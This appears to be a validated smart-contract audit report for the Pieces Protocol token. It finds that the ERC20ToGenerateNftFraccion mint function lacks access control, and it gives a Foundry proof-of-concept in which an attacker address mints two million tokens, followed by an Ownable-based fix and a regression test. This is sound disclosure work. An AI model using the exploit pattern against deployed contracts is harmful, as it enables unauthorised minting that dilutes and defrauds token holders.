Pieces Protocol

First Flight #32
Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: high
Valid

`ERC20ToGenerateNFTFraccion:mint` has no access control, so anyone can mint tokens.

Summary

The `ERC20ToGenerateNFTFraccion:mint` function lacks access control, so any address can call it and mint an arbitrary amount of tokens to itself.

Vulnerability Details

Create a test file named `Exploit.t.sol` in your unit test directory and insert the code below:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Test} from "forge-std/Test.sol";
import "../../src/token/ERC20ToGenerateNftFraccion.sol";

contract Exploit is Test {
    address public attacker = address(0xBEEF);
    ERC20ToGenerateNftFraccion public erc20Contract;

    function setUp() public {
        erc20Contract = new ERC20ToGenerateNftFraccion("TestToken", "TT");
        vm.label(attacker, "Attacker");
    }

    // An unprivileged address calls mint() directly; with no access control
    // the call succeeds and the attacker's balance equals the requested amount.
    function testMintExploit() public {
        vm.startPrank(attacker);
        uint256 amountToMint = 2_000_000 ether;
        erc20Contract.mint(attacker, amountToMint);
        vm.stopPrank();

        uint256 balance = erc20Contract.balanceOf(attacker);
        assertEq(balance, amountToMint, "Balance doesn't match minted amount");
        emit log_named_uint("Attacker Token Balance", balance);
    }
}
```

Impact

HIGH: Since anyone can mint an unlimited number of tokens without restriction, an attacker can mint tokens for themselves and later sell them, disrupting the protocol's tokenomics and ecosystem.

Tools Used

Manual code review.

Recommendations

Use OpenZeppelin's Ownable library so that only the owner can mint tokens, and trade the `mint` function for `safeMint`, as it is safer.
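The following is an added illustration of the recommended fix together with a regression test, written for this report and not taken from the Pieces Protocol code base. `GuardedFractionToken` is a stand-in for the project's `ERC20ToGenerateNftFraccion`, and it assumes OpenZeppelin Contracts v5, where `Ownable` takes the initial owner as a constructor argument.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Test} from "forge-std/Test.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";

/// Illustrative hardened token, not the project's ERC20ToGenerateNftFraccion.
/// Only the owner (intended to be the contract that fractionalises the NFT)
/// can mint. Assumes OpenZeppelin Contracts v5 (Ownable(initialOwner)).
contract GuardedFractionToken is ERC20, Ownable {
    constructor(string memory name_, string memory symbol_, address initialOwner)
        ERC20(name_, symbol_)
        Ownable(initialOwner)
    {}

    /// Reverts with OwnableUnauthorizedAccount for any caller but the owner.
    function mint(address to, uint256 amount) external onlyOwner {
        _mint(to, amount);
    }
}

/// Regression test: the unprivileged call that succeeded against the
/// original contract must now revert, while the owner can still mint.
contract GuardedFractionTokenTest is Test {
    address owner = address(0xA11CE);   // constructed test addresses
    address attacker = address(0xBEEF);
    GuardedFractionToken token;

    function setUp() public {
        token = new GuardedFractionToken("TestToken", "TT", owner);
    }

    function testAttackerCannotMint() public {
        vm.prank(attacker);
        vm.expectRevert(
            abi.encodeWithSelector(Ownable.OwnableUnauthorizedAccount.selector, attacker)
        );
        token.mint(attacker, 2_000_000 ether);
        assertEq(token.balanceOf(attacker), 0, "attacker balance must stay zero");
    }

    function testOwnerCanMint() public {
        vm.prank(owner);
        token.mint(owner, 1 ether);
        assertEq(token.balanceOf(owner), 1 ether, "owner mint should succeed");
    }
}
```

Run with `forge test --match-contract GuardedFractionTokenTest`; the first test is the same call the exploit above makes, now expected to revert.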
Updates

Lead Judging Commences

fishy Lead Judge 4 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Lack of token access control checks

Any person can mint the ERC20 token generated in representation of the NFT
